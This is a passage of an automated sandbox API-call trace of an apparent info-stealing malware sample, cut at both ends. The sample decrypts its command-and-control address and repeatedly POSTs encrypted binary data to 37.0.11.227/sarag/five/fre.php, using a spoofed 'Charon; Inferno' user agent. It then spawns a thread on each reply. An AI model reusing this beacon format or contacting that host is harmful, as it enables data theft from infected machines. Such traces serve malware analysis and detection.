szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0309.416] GetProcessHeap () returned 0x690000 [0309.416] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0309.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.417] CryptImportKey (in: hProv=0x6af100, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0309.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.418] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.419] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.419] GetProcessHeap () returned 0x690000 [0309.419] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0309.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.420] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0309.421] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.421] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0309.421] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.422] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0309.422] GetProcessHeap () returned 0x690000 [0309.422] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0309.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.423] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0309.423] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.423] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0309.424] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.424] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0309.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.425] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0309.425] GetProcessHeap () returned 0x690000 [0309.425] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0309.425] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0309.425] GetProcessHeap () returned 0x690000 [0309.426] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0309.426] GetProcessHeap () returned 0x690000 [0309.426] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0309.426] GetProcessHeap () returned 0x690000 [0309.426] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0309.426] GetProcessHeap () returned 0x690000 [0309.426] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0309.427] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.427] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.431] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0309.437] GetProcessHeap () returned 0x690000 [0309.437] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0309.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.438] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0309.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.439] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.440] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.440] GetProcessHeap () returned 0x690000 [0309.440] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0309.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.442] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0309.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.443] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0309.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.444] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0309.444] GetProcessHeap () returned 0x690000 [0309.444] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0309.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.446] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0309.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.447] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0309.448] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.448] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0309.449] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.449] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0309.449] GetProcessHeap () returned 0x690000 [0309.449] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0309.449] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0309.449] GetProcessHeap () returned 0x690000 [0309.449] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0309.449] socket (af=2, type=1, protocol=6) returned 0xa54 [0309.449] connect (s=0xa54, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0309.471] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0309.471] GetProcessHeap () returned 0x690000 [0309.471] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0309.471] GetProcessHeap () returned 0x690000 [0309.471] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0309.472] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0309.473] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0309.473] GetProcessHeap () returned 0x690000 [0309.473] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0309.473] GetProcessHeap () returned 0x690000 [0309.473] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0309.473] GetProcessHeap () returned 0x690000 [0309.473] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0309.473] GetProcessHeap () returned 0x690000 [0309.473] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0309.474] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0309.483] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0309.483] GetProcessHeap () returned 0x690000 [0309.483] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0309.484] GetProcessHeap () returned 0x690000 [0309.484] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0309.484] send (s=0xa54, buf=0x6ad508*, len=242, flags=0) returned 242 [0309.485] send (s=0xa54, buf=0x6aba40*, len=159, flags=0) returned 159 [0309.485] GetProcessHeap () returned 0x690000 [0309.485] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0309.485] recv (in: s=0xa54, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0309.551] GetProcessHeap () returned 0x690000 [0309.552] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0309.552] GetProcessHeap () returned 0x690000 [0309.553] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0309.553] GetProcessHeap () returned 0x690000 [0309.553] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0309.553] GetProcessHeap () returned 0x690000 [0309.553] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0309.553] closesocket (s=0xa54) returned 0 [0309.554] GetProcessHeap () returned 0x690000 [0309.554] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0309.554] GetProcessHeap () returned 0x690000 [0309.554] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0309.554] GetProcessHeap () returned 0x690000 [0309.554] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0309.554] GetProcessHeap () returned 0x690000 [0309.555] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0309.555] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf30) returned 0xa54 [0309.556] Sleep (dwMilliseconds=0xea60) [0309.558] GetProcessHeap () returned 0x690000 [0309.558] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0309.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.559] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.565] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0309.571] GetProcessHeap () returned 0x690000 [0309.571] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0309.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.572] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0309.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.573] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.574] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.574] GetProcessHeap () returned 0x690000 [0309.574] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0309.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.575] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0309.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.576] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0309.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.577] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0309.577] GetProcessHeap () returned 0x690000 [0309.577] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0309.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.578] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0309.579] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.579] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0309.580] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.580] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0309.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.581] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0309.581] GetProcessHeap () returned 0x690000 [0309.581] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0309.581] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0309.581] GetProcessHeap () returned 0x690000 [0309.582] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0309.582] GetProcessHeap () returned 0x690000 [0309.582] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0309.582] GetProcessHeap () returned 0x690000 [0309.583] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0309.583] GetProcessHeap () returned 0x690000 [0309.583] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0309.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.584] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.588] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0309.593] GetProcessHeap () returned 0x690000 [0309.593] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0309.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.594] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0309.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.595] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.595] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.595] GetProcessHeap () returned 0x690000 [0309.596] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0309.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.601] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0309.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.602] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0309.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.603] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0309.603] GetProcessHeap () returned 0x690000 [0309.603] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0309.604] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.604] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0309.605] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.605] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0309.605] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.606] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0309.606] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.606] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0309.606] GetProcessHeap () returned 0x690000 [0309.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0309.606] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0309.606] GetProcessHeap () returned 0x690000 [0309.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3c0 [0309.607] socket (af=2, type=1, protocol=6) returned 0xa58 [0309.607] connect (s=0xa58, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0309.634] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0309.634] GetProcessHeap () returned 0x690000 [0309.634] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0309.634] GetProcessHeap () returned 0x690000 [0309.634] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0309.635] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0309.636] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0309.636] GetProcessHeap () returned 0x690000 [0309.636] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0309.636] GetProcessHeap () returned 0x690000 [0309.636] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0309.636] GetProcessHeap () returned 0x690000 [0309.636] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0309.636] GetProcessHeap () returned 0x690000 [0309.636] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0309.637] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0309.638] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0309.638] GetProcessHeap () returned 0x690000 [0309.638] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0309.638] GetProcessHeap () returned 0x690000 [0309.638] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0309.638] send (s=0xa58, buf=0x6ad508*, len=242, flags=0) returned 242 [0309.639] send (s=0xa58, buf=0x6aba40*, len=159, flags=0) returned 159 [0309.639] GetProcessHeap () returned 0x690000 [0309.639] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0309.639] recv (in: s=0xa58, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0309.732] GetProcessHeap () returned 0x690000 [0309.733] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0309.733] GetProcessHeap () returned 0x690000 [0309.733] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0309.734] GetProcessHeap () returned 0x690000 [0309.734] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0309.734] GetProcessHeap () returned 0x690000 [0309.734] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0309.735] closesocket (s=0xa58) returned 0 [0309.735] GetProcessHeap () returned 0x690000 [0309.735] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3c0 | out: hHeap=0x690000) returned 1 [0309.735] GetProcessHeap () returned 0x690000 [0309.735] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0309.736] GetProcessHeap () returned 0x690000 [0309.736] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0309.736] GetProcessHeap () returned 0x690000 [0309.737] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0309.737] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf38) returned 0xa58 [0309.738] Sleep (dwMilliseconds=0xea60) [0309.741] GetProcessHeap () returned 0x690000 [0309.741] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0309.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.742] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.747] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0309.752] GetProcessHeap () returned 0x690000 [0309.752] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0309.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.753] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0309.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.754] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.755] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.755] GetProcessHeap () returned 0x690000 [0309.755] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0309.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.756] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: 